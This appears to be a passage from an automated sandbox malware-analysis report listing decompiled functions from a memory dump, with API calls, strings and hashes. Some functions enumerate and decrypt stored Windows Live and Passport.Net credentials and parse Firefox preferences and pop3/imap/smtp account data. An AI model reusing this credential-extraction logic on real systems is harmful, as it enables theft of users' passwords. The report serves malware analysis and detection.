Uniqueness

Uniqueness Score: -1.00%

Function 0040F09D, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040F09D(char* __eax, void* __ecx) {
				void* _t2;
				char* _t3;
				void* _t5;
				void* _t6;
				void* _t7;

				_t3 = __eax;
				_t6 = __ecx;
				_t5 = 4;
				while(1) {
					_t2 =  *_t3;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t5);
					_push("&lt;");
					L14:
					_t2 = memcpy(_t6, ??, ??);
					_t7 = _t7 + 0xc;
					_t6 = _t6 + _t5;
					L16:
					if( *_t3 != 0) {
						_t3 = _t3 + 1;
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if(_t2 != 0xb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t6 = _t2;
										_t6 = _t6 + 1;
									} else {
										_push(_t5);
										_push("<br>");
										goto L14;
									}
								} else {
									_push(5);
									_push("&amp;");
									goto L11;
								}
							} else {
								_push(5);
								_push("&deg;");
								L11:
								_t2 = memcpy(_t6, ??, ??);
								_t7 = _t7 + 0xc;
								_t6 = _t6 + 5;
							}
						} else {
							_t2 = memcpy(_t6, "&quot;", 6);
							_t7 = _t7 + 0xc;
							_t6 = _t6 + 6;
						}
					} else {
						_push(_t5);
						_push("&gt;");
						goto L14;
					}
					goto L16;
				}
			}

0x0040f0a2
0x0040f0a4
0x0040f0a6
0x0040f0a7
0x0040f0a7
0x0040f0ab
0x00000000
0x00000000
0x0040f0ad
0x0040f0ae
0x0040f10a
0x0040f10b
0x0040f110
0x0040f113
0x0040f11a
0x0040f11d
0x0040f11f
0x00000000
0x0040f11f
0x0040f125
0x0040f0b5
0x0040f0b7
0x0040f0c3
0x0040f0dc
0x0040f0e9
0x0040f102
0x0040f117
0x0040f119
0x0040f104
0x0040f104
0x0040f105
0x00000000
0x0040f105
0x0040f0eb
0x0040f0eb
0x0040f0ed
0x00000000
0x0040f0ed
0x0040f0de
0x0040f0de
0x0040f0e0
0x0040f0f2
0x0040f0f3
0x0040f0f8
0x0040f0fb
0x0040f0fb
0x0040f0c5
0x0040f0cd
0x0040f0d2
0x0040f0d5
0x0040f0d5
0x0040f0b9
0x0040f0b9
0x0040f0ba
0x00000000
0x0040f0ba
0x00000000
0x0040f0b7

APIs

memcpy.MSVCRT ref: 0040F0CD
memcpy.MSVCRT ref: 0040F0F3
memcpy.MSVCRT ref: 0040F10B

Strings

>, xrefs: 0040F0BA
°, xrefs: 0040F0E0
&, xrefs: 0040F0ED
", xrefs: 0040F0C7
, xrefs: 0040F105
<, xrefs: 0040F0AE

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memcpy
String ID: &$°$>$<$"$
API String ID: 3510742995-3273207271
Opcode ID: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
Instruction ID: 3259d816fa1e591736f6461b451ad75962e4f861ee845343ab42ffe8f3feec31
Opcode Fuzzy Hash: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
Instruction Fuzzy Hash: 450171B2E852A4B5DA350905AC07FA70B865BA6B11F350037F58639AC2E1AD0D8F516F

Uniqueness

Uniqueness Score: -1.00%

Function 0040D865, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040D865(intOrPtr* _a4) {
				char _v260;
				char _v516;
				void _v771;
				char _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v788;
				int _v796;
				char _v800;
				signed int _v804;
				char _v808;
				char _v812;
				void* __edi;
				void* __esi;
				intOrPtr* _t52;
				void* _t53;
				void* _t57;
				signed int _t58;
				char* _t65;
				unsigned int _t68;
				intOrPtr _t69;
				void* _t85;
				char* _t89;
				intOrPtr _t92;
				intOrPtr* _t93;
				signed int _t94;
				void* _t96;

				_t52 = _a4;
				_t96 = (_t94 & 0xfffffff8) - 0x32c;
				_push(_t85);
				 *((intOrPtr*)(_t52 + 4)) = 0;
				 *((intOrPtr*)(_t52 + 8)) = 0;
				_t89 = 0;
				_t53 = E00406278();
				_t97 =  *((intOrPtr*)(_t53 + 4)) - 5;
				if( *((intOrPtr*)(_t53 + 4)) > 5) {
					_t89 = L"WindowsLive:name=*";
				}
				_v800 = 0;
				_v796 = 0;
				if(E00404647( &_v800, _t85, _t97) == 0) {
					L21:
					return E004046C2( &_v800);
				}
				_v808 = 0;
				_v812 = 0;
				if(_v780 == 0) {
					_t57 = 0;
					__eflags = 0;
				} else {
					_t57 = _v776(_t89, 0,  &_v812,  &_v808);
				}
				if(_t57 == 0) {
					goto L21;
				} else {
					_t58 = 0;
					_v804 = 0;
					if(_v812 <= 0) {
						L20:
						_v788(_v808);
						goto L21;
					} else {
						do {
							_t92 =  *((intOrPtr*)(_v808 + _t58 * 4));
							if( *((intOrPtr*)(_t92 + 4)) == 1 &&  *(_t92 + 8) != 0 &&  *(_t92 + 0x30) != 0) {
								_v772 = 0;
								memset( &_v771, 0, 0xff);
								_t96 = _t96 + 0xc;
								if(WideCharToMultiByte(0, 0,  *(_t92 + 8), 0xffffffff,  &_v772, 0xff, 0, 0) > 0) {
									_push(0x11);
									_t65 =  &_v772;
									_push("windowslive:name=");
									_push(_t65);
									L00411612();
									_t96 = _t96 + 0xc;
									if(_t65 == 0) {
										_v516 = 0;
										_v260 = 0;
										WideCharToMultiByte(0, 0,  *(_t92 + 0x30), 0xffffffff,  &_v516, 0xff, 0, 0);
										_t68 =  *(_t92 + 0x18);
										if(_t68 > 0) {
											WideCharToMultiByte(0, 0,  *(_t92 + 0x1c), _t68 >> 1,  &_v260, 0xff, 0, 0);
											 *((char*)(_t96 + ( *(_t92 + 0x18) >> 1) + 0x238)) = 0;
										}
										if(_v260 == 0) {
											_t69 = _a4;
											_t44 = _t69 + 8;
											 *_t44 =  *((intOrPtr*)(_t69 + 8)) + 1;
											__eflags =  *_t44;
										} else {
											_t93 = _a4;
											 *((intOrPtr*)( *_t93 + 4))( &_v516);
											 *((intOrPtr*)(_t93 + 4)) =  *((intOrPtr*)(_t93 + 4)) + 1;
										}
									}
								}
							}
							_t58 = _v804 + 1;
							_v804 = _t58;
						} while (_t58 < _v812);
						goto L20;
					}
				}
			}

0x0040d86b
0x0040d86e
0x0040d878
0x0040d879
0x0040d87c
0x0040d87f
0x0040d881
0x0040d886
0x0040d88a
0x0040d88c
0x0040d88c
0x0040d895
0x0040d899
0x0040d8a4
0x0040d9e7
0x0040d9f6
0x0040d9f6
0x0040d8ae
0x0040d8b2
0x0040d8b6
0x0040d8ca
0x0040d8ca
0x0040d8b8
0x0040d8c4
0x0040d8c4
0x0040d8ce
0x00000000
0x0040d8d4
0x0040d8d4
0x0040d8da
0x0040d8de
0x0040d9df
0x0040d9e3
0x00000000
0x0040d8e4
0x0040d8e9
0x0040d8ed
0x0040d8f4
0x0040d913
0x0040d917
0x0040d91c
0x0040d936
0x0040d93c
0x0040d93e
0x0040d942
0x0040d947
0x0040d948
0x0040d94d
0x0040d952
0x0040d964
0x0040d96d
0x0040d974
0x0040d97a
0x0040d97f
0x0040d994
0x0040d99f
0x0040d99f
0x0040d9ad
0x0040d9c6
0x0040d9c9
0x0040d9c9
0x0040d9c9
0x0040d9af
0x0040d9af
0x0040d9be
0x0040d9c1
0x0040d9c1
0x0040d9ad
0x0040d952
0x0040d936
0x0040d9d0
0x0040d9d5
0x0040d9d5
0x00000000
0x0040d8e9
0x0040d8de

APIs

Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292

memset.MSVCRT ref: 0040D917
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040D92E
_strnicmp.MSVCRT ref: 0040D948
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D974
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D994

Strings

WindowsLive:name=*, xrefs: 0040D88C, 0040D8C3
windowslive:name=, xrefs: 0040D942

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$Version_strnicmpmemset
String ID: WindowsLive:name=*$windowslive:name=
API String ID: 945165440-3589380929
Opcode ID: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
Instruction ID: 27d6d704735a973bd95cec350459a8e2137e61d4893fa240fc9d50cc053063f8
Opcode Fuzzy Hash: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
Instruction Fuzzy Hash: FD4183B1904345AFC720EF54D9849ABBBECEB84344F044A3EF995A3291D734DD48CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00405960, Relevance: 12.1, APIs: 8, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00405960(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
				RECT* _v8;
				void* __esi;
				void* _t39;
				signed int _t41;
				void* _t42;
				struct HWND__* _t47;
				signed int _t53;
				void* _t54;
				signed int _t76;
				signed int _t78;
				void* _t80;
				void** _t82;
				signed int _t86;
				void* _t90;
				signed int _t91;

				_t80 = __edi;
				_push(_t58);
				_push(0xc);
				_v8 = 0;
				 *((intOrPtr*)(__edi + 0x10)) = __eax;
				L004115D0();
				if(__eax == 0) {
					_t82 = 0;
				} else {
					 *((intOrPtr*)(__eax)) = 0;
					_t82 = __eax;
				}
				 *(_t80 + 0xc) = _t82;
				_t39 =  *_t82;
				_t90 = _t39;
				if(_t90 != 0) {
					_push(_t39);
					L004115D6();
					 *_t82 = 0;
				}
				_t82[2] = _a8;
				_t41 = E004049FB(_a8);
				_t76 = 4;
				_t82[1] = _t41;
				_t42 = _t41 * _t76;
				_push( ~(0 | _t90 > 0x00000000) | _t42);
				L004115D0();
				 *_t82 = _t42;
				memset(_t42, 0, _t82[1] << 2);
				E00408441( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
				_t91 =  *(_t80 + 0x10);
				if(_t91 == 0) {
					_t86 = ( *(_t80 + 0xc))[1];
					_t78 = 0x14;
					_t53 = _t86 * _t78;
					_push( ~(0 | _t91 > 0x00000000) | _t53);
					L004115D0();
					 *(_t80 + 0x10) = _t53;
					if(_t86 > 0) {
						_t54 = 0;
						do {
							 *((intOrPtr*)(_t54 +  *(_t80 + 0x10) + 0xc)) = 0x78;
							_t54 = _t54 + 0x14;
							_t86 = _t86 - 1;
						} while (_t86 != 0);
					}
					_v8 = 1;
				}
				if(E00401540(0x448, _t80, _a4) == 1) {
					E004083B1( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
					InvalidateRect(( *(_t80 + 0xc))[2], 0, 0);
				}
				_t47 = SetFocus(_a8);
				if(_v8 != 0) {
					_push( *(_t80 + 0x10));
					L004115D6();
				}
				return _t47;
			}

0x00405960
0x00405964
0x00405969
0x0040596b
0x0040596e
0x00405971
0x00405979
0x00405981
0x0040597b
0x0040597b
0x0040597d
0x0040597d
0x00405983
0x00405986
0x00405988
0x0040598a
0x0040598c
0x0040598d
0x00405993
0x00405993
0x00405999
0x0040599c
0x004059a6
0x004059a7
0x004059aa
0x004059b3
0x004059b4
0x004059c3
0x004059c5
0x004059d3
0x004059d8
0x004059db
0x004059e0
0x004059e7
0x004059ea
0x004059f3
0x004059f4
0x004059fc
0x004059ff
0x00405a01
0x00405a03
0x00405a06
0x00405a0e
0x00405a11
0x00405a11
0x00405a03
0x00405a14
0x00405a14
0x00405a2c
0x00405a34
0x00405a41
0x00405a41
0x00405a4a
0x00405a53
0x00405a55
0x00405a58
0x00405a5d
0x00405a61

APIs

??2@YAPAXI@Z.MSVCRT ref: 00405971
??3@YAXPAX@Z.MSVCRT ref: 0040598D
??2@YAPAXI@Z.MSVCRT ref: 004059B4
memset.MSVCRT ref: 004059C5
??2@YAPAXI@Z.MSVCRT ref: 004059F4
InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405A41
SetFocus.USER32(?,?,?,?), ref: 00405A4A
??3@YAXPAX@Z.MSVCRT ref: 00405A58

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??2@$??3@$FocusInvalidateRectmemset
String ID:
API String ID: 2313361498-0
Opcode ID: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
Instruction ID: c71b172428599a8aed3dd41af9edf36fe528ac6939486576e3287dd5c50b91d7
Opcode Fuzzy Hash: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
Instruction Fuzzy Hash: 9931C6B2600605BFDB149F29D88591AF7A5FF44354B10863FF54AE72A0DB78EC408F98

Uniqueness

Uniqueness Score: -1.00%

Function 00406069, Relevance: 12.0, APIs: 8, Instructions: 42
clipboardmemorystringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406069(void* _a4) {
				signed int _t11;
				int _t13;
				void* _t17;
				signed int _t19;
				void* _t22;

				_t22 = _a4;
				_t19 = 0;
				EmptyClipboard();
				if(_t22 != 0) {
					_t2 = strlen(_t22) + 1; // 0x1
					_t13 = _t2;
					_t17 = GlobalAlloc(0x2000, _t13);
					if(_t17 != 0) {
						memcpy(GlobalLock(_t17), _t22, _t13);
						GlobalUnlock(_t17);
						_t11 = SetClipboardData(1, _t17);
						asm("sbb esi, esi");
						_t19 =  ~( ~_t11);
					}
				}
				CloseClipboard();
				return _t19;
			}

0x0040606a
0x0040606f
0x00406071
0x00406079
0x00406084
0x00406084
0x00406093
0x00406097
0x004060a3
0x004060ac
0x004060b5
0x004060bf
0x004060c1
0x004060c1
0x004060c4
0x004060c5
0x004060cf

APIs

EmptyClipboard.USER32(?,?,0040AEA7,?), ref: 00406071
strlen.MSVCRT ref: 0040607E
GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AEA7,?), ref: 0040608D
GlobalLock.KERNEL32 ref: 0040609A
memcpy.MSVCRT ref: 004060A3
GlobalUnlock.KERNEL32(00000000), ref: 004060AC
SetClipboardData.USER32 ref: 004060B5
CloseClipboard.USER32 ref: 004060C5

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
String ID:
API String ID: 3116012682-0
Opcode ID: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
Instruction ID: 7816216ade6a299d8ea944e6e9fe2aa84d769726faeb140b6a28ec5125b6acba
Opcode Fuzzy Hash: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
Instruction Fuzzy Hash: 0DF0B4375402296BC3102BA0AD4CEDB7B6CEBC8B557028139FB0AD3151EA78592487B9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C530, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040C530(void* __eflags, intOrPtr* _a4) {
				int _v8;
				char _v12;
				intOrPtr _v16;
				void _v1029;
				void _v1039;
				char _v1040;
				void _v2063;
				void _v2064;
				void _v3087;
				void _v3088;
				void* __ebx;
				intOrPtr _t53;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t67;
				void* _t68;
				void* _t73;
				void* _t85;
				int _t86;
				void* _t106;
				int _t107;
				int _t111;
				void* _t114;
				void* _t115;
				void* _t116;

				_v1040 = 0;
				memset( &_v1039, 0, 0x3ff);
				_v3088 = 0;
				memset( &_v3087, 0, 0x3ff);
				_v2064 = 0;
				memset( &_v2063, 0, 0x3ff);
				_t116 = _t115 + 0x24;
				_t53 = E00406B74(_a4 + 4);
				_v12 = 0;
				_v16 = _t53;
				_t54 = E00406900(_t53,  &_v1040,  &_v1040,  &_v12);
				if(_t54 != 0) {
					do {
						_t56 = E004069D2(0, "user_pref(\"");
						_pop(_t92);
						if(_t56 != 0) {
							goto L10;
						}
						_push(0x412b10);
						_t60 = 0xb;
						_t14 = E004069D2(_t60) - 0xb; // -11
						_t92 = _t14;
						_v8 = _t92;
						if(_t92 <= 0) {
							goto L10;
						}
						_t85 = E004069D2(_t61 + 1, 0x412b18);
						_t17 = _t85 + 1; // 0x1
						_t106 = E004069D2(_t17, 0x412b10);
						if(_t106 <= 0) {
							_t28 = _t85 + 1; // 0x1
							_t67 = E004069D2(_t28, ")");
							_pop(_t92);
							_t68 = 0xfffffffe;
							_t111 = _t67 + _t68 - _t85;
							if(_t111 <= 0) {
								goto L10;
							}
							_t107 = _v8;
							memcpy( &_v3088,  &_v1029, _t107);
							 *((char*)(_t114 + _t107 - 0xc0c)) = 0;
							_t73 = _t114 + _t85 - 0x40a;
							L9:
							memcpy( &_v2064, _t73, _t111);
							_t92 = _a4;
							_t116 = _t116 + 0x18;
							 *((char*)(_t114 + _t111 - 0x80c)) = 0;
							_t59 =  *((intOrPtr*)( *_a4))( &_v3088,  &_v2064);
							if(_t59 == 0) {
								break;
							}
							goto L10;
						}
						_t20 = _t106 + 1; // 0x1
						_t111 = E004069D2(_t20, 0x412b10) - _t106 - 1;
						_pop(_t92);
						if(_t111 <= 0) {
							goto L10;
						}
						_t86 = _v8;
						memcpy( &_v3088,  &_v1029, _t86);
						 *((char*)(_t114 + _t86 - 0xc0c)) = 0;
						_t73 = _t114 + _t106 - 0x40b;
						goto L9;
						L10:
						_t59 = E00406900(_v16, _t92,  &_v1040,  &_v12);
					} while (_t59 != 0);
					return _t59;
				}
				return _t54;
			}

0x0040c54b
0x0040c551
0x0040c55f
0x0040c565
0x0040c573
0x0040c579
0x0040c581
0x0040c587
0x0040c596
0x0040c59c
0x0040c59f
0x0040c5a8
0x0040c5af
0x0040c5bc
0x0040c5c3
0x0040c5c4
0x00000000
0x00000000
0x0040c5cf
0x0040c5d2
0x0040c5df
0x0040c5df
0x0040c5e4
0x0040c5e7
0x00000000
0x00000000
0x0040c5fe
0x0040c600
0x0040c610
0x0040c61b
0x0040c661
0x0040c664
0x0040c669
0x0040c66e
0x0040c671
0x0040c675
0x00000000
0x00000000
0x0040c677
0x0040c689
0x0040c68e
0x0040c696
0x0040c69d
0x0040c6a6
0x0040c6ab
0x0040c6b0
0x0040c6c1
0x0040c6c9
0x0040c6cd
0x00000000
0x00000000
0x00000000
0x0040c6cd
0x0040c61d
0x0040c62a
0x0040c62d
0x0040c62e
0x00000000
0x00000000
0x0040c634
0x0040c646
0x0040c64b
0x0040c653
0x00000000
0x0040c6cf
0x0040c6dd
0x0040c6e5
0x00000000
0x0040c6ec
0x0040c6f0

APIs

memset.MSVCRT ref: 0040C551
memset.MSVCRT ref: 0040C565
memset.MSVCRT ref: 0040C579

Part of subcall function 004069D2: strlen.MSVCRT ref: 004069E4
Part of subcall function 004069D2: strlen.MSVCRT ref: 004069EC
Part of subcall function 004069D2: _memicmp.MSVCRT ref: 00406A0A

memcpy.MSVCRT ref: 0040C646
memcpy.MSVCRT ref: 0040C689
memcpy.MSVCRT ref: 0040C6A6

Strings

user_pref(", xrefs: 0040C5AF

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memcpymemset$strlen$_memicmp
String ID: user_pref("
API String ID: 765841271-2487180061
Opcode ID: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
Instruction ID: b5bbfaa39c0e48752cfa6ff41fc25d90fc637c7d31dd27b270ce5155e9a91379
Opcode Fuzzy Hash: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
Instruction Fuzzy Hash: A74168B2904118AADB10DB95DCC0EDA77AD9F44314F1046BBE605F7181EA389F49CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5DB, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 97
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040D5DB(char* __ebx, void* __eflags) {
				char _v8;
				short* _v12;
				int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v48;
				intOrPtr _v52;
				int _v56;
				char _v60;
				char _v584;
				void* __edi;
				void* __esi;
				void* _t36;
				intOrPtr _t44;
				void* _t47;
				char _t63;
				int _t69;
				void* _t74;

				_t74 = __eflags;
				_t69 = 0;
				E004046D7( &_v584);
				_v60 = 0;
				_v56 = 0;
				_t36 = E00404647( &_v60, 0, _t74);
				_t75 = _t36;
				if(_t36 != 0 && E004047A0( &_v584, _t75) != 0) {
					_push( &_v8);
					_push(0);
					_push(4);
					_push("Passport.Net\\*");
					if(_v52() != 0) {
						_t44 = _v8;
						if( *((intOrPtr*)(_t44 + 0x30)) != 0 &&  *((intOrPtr*)(_t44 + 0x18)) > 0) {
							_v32 =  *((intOrPtr*)(_t44 + 0x18));
							_v28 =  *((intOrPtr*)(_t44 + 0x1c));
							_t47 = 0;
							_t63 = 0x4a;
							do {
								_t14 = _t47 + L"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; // 0x320038
								 *(_t47 + 0x417768) =  *_t14 << 2;
								_t47 = _t47 + 2;
							} while (_t47 < _t63);
							_v24 = _t63;
							_v20 = 0x417768;
							if(E00404811( &_v584,  &_v32,  &_v24,  &_v16) != 0) {
								if(WideCharToMultiByte(0, 0, _v12, _v16,  &(__ebx[0x100]), 0xff, 0, 0) > 0 && strlen( *(_v8 + 0x30)) < 0xff) {
									strcpy(__ebx,  *(_v8 + 0x30));
									_t69 = 1;
								}
								LocalFree(_v12);
							}
							_t44 = _v8;
						}
						_v48(_t44);
					}
				}
				E004046C2( &_v60);
				E004047F1( &_v584);
				return _t69;
			}

0x0040d5db
0x0040d5ec
0x0040d5ee
0x0040d5f6
0x0040d5f9
0x0040d5fc
0x0040d601
0x0040d603
0x0040d619
0x0040d61a
0x0040d61b
0x0040d61d
0x0040d627
0x0040d62d
0x0040d633
0x0040d645
0x0040d64d
0x0040d650
0x0040d652
0x0040d653
0x0040d653
0x0040d65e
0x0040d666
0x0040d667
0x0040d67d
0x0040d680
0x0040d68e
0x0040d6af
0x0040d6c8
0x0040d6d1
0x0040d6d1
0x0040d6d5
0x0040d6d5
0x0040d6db
0x0040d6db
0x0040d6df
0x0040d6df
0x0040d627
0x0040d6e5
0x0040d6f0
0x0040d6fa

APIs

Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726

Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,7614F420), ref: 00404654
Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D

Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7614F420), ref: 004047A8
Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
strlen.MSVCRT ref: 0040D6B7
strcpy.MSVCRT(?,?), ref: 0040D6C8
LocalFree.KERNEL32(?), ref: 0040D6D5

Strings

hwA, xrefs: 0040D680
Passport.Net\*, xrefs: 0040D61D

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$LibraryLoadstrcpy$ByteCharFreeLocalMultiWidestrlen
String ID: Passport.Net\*$hwA
API String ID: 3335197805-2625321100
Opcode ID: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
Instruction ID: 2e6419ae4a5a1056fcde8d8ccc48918818cbcf4cd0f285746335566170a6875e
Opcode Fuzzy Hash: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
Instruction Fuzzy Hash: D4315C76D00109ABCB10EF96D9449EEB7BDEF84300F10047AF605E7291DB399A45CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004044DA, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E004044DA(intOrPtr __ecx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t44;
				intOrPtr _t50;
				void* _t56;
				intOrPtr _t58;
				void* _t63;

				_t63 = __fp0;
				_t50 = __ecx;
				_v8 = __ecx;
				E004021D8( &_v940);
				_t58 = _a4;
				_v800 =  *((intOrPtr*)(_t50 + 0xd6c));
				_push(_t58 + 0x404);
				_t44 = 0x7f;
				E004060D0(_t44,  &_v796);
				E004060D0(_t44,  &_v408, _t58 + 0x204);
				E004060D0(_t44,  &_v928, _t58 + 4);
				E004060D0(_t44,  &_v668, _t58 + 0x104);
				_t37 = E004060D0(_t44,  &_v280, _t58 + 0x304);
				_t56 = _t58 + 0x504;
				_push("pop3");
				_push(_t56);
				L004115B2();
				if(_t37 != 0) {
					_push("imap");
					_push(_t56);
					L004115B2();
					if(_t37 != 0) {
						_push("smtp");
						_push(_t56);
						L004115B2();
						if(_t37 == 0) {
							_v412 = 4;
						}
					} else {
						_v412 = 2;
					}
				} else {
					_v412 = 1;
				}
				_v24 =  *((intOrPtr*)(_t58 + 0x804));
				_v20 =  *((intOrPtr*)(_t58 + 0x808));
				return E00402407( &_v940, _t63, _v8 + 0xfffffe38);
			}

0x004044da
0x004044e6
0x004044ee
0x004044f1
0x004044fc
0x004044ff
0x0040450b
0x0040450e
0x00404515
0x00404527
0x00404536
0x00404548
0x0040455a
0x0040455f
0x00404565
0x0040456a
0x0040456b
0x00404575
0x00404583
0x00404588
0x00404589
0x00404592
0x004045a0
0x004045a5
0x004045a6
0x004045af
0x004045b1
0x004045b1
0x00404594
0x00404594
0x00404594
0x00404577
0x00404577
0x00404577
0x004045c1
0x004045ca
0x004045e5

APIs

Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA

_stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 0040456B
_stricmp.MSVCRT(?,imap), ref: 00404589

Strings

pop3, xrefs: 00404565
imap, xrefs: 00404583
smtp, xrefs: 004045A0

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _stricmp$memcpystrlen
String ID: imap$pop3$smtp
API String ID: 445763297-821077329
Opcode ID: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
Instruction ID: 85134e65636b23d23915c58aa006eeb0f313b09a76600224a93e2cbe40a0dcf5
Opcode Fuzzy Hash: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
Instruction Fuzzy Hash: 8F2174B2500318ABC711DB61CD41BDBB3FDAF50314F10056BE64AB3181DBB87B858B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040684D, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040684D(char* __ebx, intOrPtr _a4, int _a8) {
				char _v8;
				void _v1031;
				void _v1032;
				void* _t26;
				char* _t27;
				int _t32;
				int _t38;
				char* _t43;
				int _t44;
				void* _t45;
				void** _t48;
				void* _t50;
				void* _t51;

				_t43 = __ebx;
				_t44 = 0;
				_v1032 = 0;
				memset( &_v1031, 0, 0x3ff);
				_t26 = _a8;
				_t51 = _t50 + 0xc;
				 *__ebx = 0;
				if(_t26 > 0) {
					_t48 = _a4 + 4;
					_v8 = _t26;
					do {
						sprintf( &_v1032, "%s (%s)",  *((intOrPtr*)(_t48 - 4)),  *_t48);
						_t32 = strlen( &_v1032);
						_a8 = _t32;
						memcpy(_t44 + __ebx,  &_v1032, _t32 + 1);
						_t45 = _t44 + _a8 + 1;
						_t38 = strlen( *_t48);
						_a8 = _t38;
						memcpy(_t45 + __ebx,  *_t48, _t38 + 1);
						_t51 = _t51 + 0x30;
						_t48 =  &(_t48[2]);
						_t18 =  &_v8;
